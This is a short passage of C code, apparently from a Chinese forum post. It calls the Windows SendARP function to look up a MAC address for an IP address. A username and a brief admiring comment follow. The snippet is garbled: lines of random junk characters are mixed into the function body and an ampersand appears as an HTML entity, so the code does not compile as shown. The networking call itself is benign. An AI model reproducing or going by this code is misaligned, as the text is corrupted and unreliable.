  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
  if(dwRet == NO_ERROR)
7 b9 |# T: G2 w. A9 Y" \$ f  {
    memcpy(pMAC, pulMac, 6);
    return TRUE;
  }
3 U+ o! f' b( |" M+ t  else return FALSE;
$ E4 S( o- \$ P}

wy617958197

大侠好厉害啊